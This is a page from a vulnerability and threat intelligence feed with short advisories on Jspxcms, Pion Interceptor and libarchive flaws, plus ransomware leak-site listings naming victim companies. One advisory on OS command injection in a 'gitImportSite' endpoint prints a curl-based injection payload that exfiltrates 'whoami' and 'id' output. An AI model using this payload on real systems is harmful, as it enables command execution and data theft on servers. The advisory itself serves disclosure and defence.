CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2024-0721 |
Description: A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. In Jspxcms 10.2.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Komponente Survey Label Handler. Durch Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
CVSS: LOW (3.5) EPSS Score: 0.15% SSVC Exploitation: none
June 9th, 2025 (7 days ago)
|
|
Description: Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite()
• //system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
Observe command output in the HTTP request from the server.
Command Injection Payload
http:///.git;curl${IFS}/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
References
https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw...
June 9th, 2025 (7 days ago)
|
|
Description: During the opening keynote at Gartner Security & Risk Management Summit 2025, analysts weighed in on how CISOs and security teams can use security fervor around AI and other tech to the betterment of their security posture.
June 9th, 2025 (7 days ago)
|
|
|
Description: Impact
Pion Interceptor versions v0.1.36 through v0.1.38 contain a bug in a RTP packet factory that can be exploited to trigger a panic with Pion based SFU via crafted RTP packets, This only affect users that use pion/interceptor.
Patches
Upgrade to v0.1.39 or later, which includes PR #338 which validates that: padLen > 0 && padLen <= payloadLength and return error on overflow, avoiding panic.
If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload.
Workarounds
At the application layer, reject any RTP packet where:
hasPadding (P-bit field) == true && (padLen == 0 || padLen > packetLen – headerLen)
before passing it to Pion’s packet factories.
References
Commit fixing the bug: https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5
Pull request: https://github.com/pion/interceptor/pull/338
Issue: https://github.com/pion/webrtc/issues/3148
References
https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77
https://github.com/pion/webrtc/issues/3148
https://github.com/pion/interceptor/pull/338
https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5
https://github.com/advisories/GHSA-f26w-gh5m-qq77
June 9th, 2025 (7 days ago)
|
|
Description: San Jose Country Club is a premier family-friendly private golf club located in Northern California, established in 1899 and known for its rich tradition. The club offers year-round golf, dining options, and various social activities, making it a sought-after destination for members in the Bay Area. It features a newly remodeled clubhouse and event facilities for hosting weddings and special events. Catering to golf enthusiasts and families alike, the club emphasizes superior service and exclusive dining experiences.
company is headquartered in 15571 Alum Rock Ave San Jose, CA 95127
The total amount of data leakage is 117.5 GB
June 9th, 2025 (7 days ago)
|
|
|
Description: Hartwig Mechanical Inc is a company that operates in the Commercial & Residential Construction industry. It employs 10to19 people and has 1Mto5M of revenue. The company is headquartered in 20800 E. Brink Street Harvard, IL 60033
The total amount of data leakage is 456 GB
June 9th, 2025 (7 days ago)
|
|
|
Description: Bumfords has been delivering reliable and competitive heating and plumbing solutions since 1968, specializing in services such as boiler installation, underfloor heating, and bathroom installations. The company prides itself on professionalism, honesty, and integrity while catering primarily to homeowners across South Yorkshire and Derbyshire. They also offer additional services including air conditioning, servicing and repairs, and boiler finance options. As a Worcester Bosch accredited installer, Bumfords emphasizes energy efficiency and customer satisfaction.
Bumford's corporate office is located at Unit 2D Shortwood Business Park, Shortwood Court, Hoyland, Barnsley, South Yorkshire, S74 9LH.
June 9th, 2025 (7 days ago)
|
|
Description: Texas said hackers compromised an account at the Department of Transportation (TxDOT) and discovered unusual activity on May 12 involving its Crash Records Information System (CRIS).
June 9th, 2025 (7 days ago)
|
|
CVE-2025-5918 |
Description: A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.
EPSS Score: 0.02%
June 9th, 2025 (7 days ago)
|
|
CVE-2025-5917 |
Description: A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation.
EPSS Score: 0.01%
June 9th, 2025 (7 days ago)
|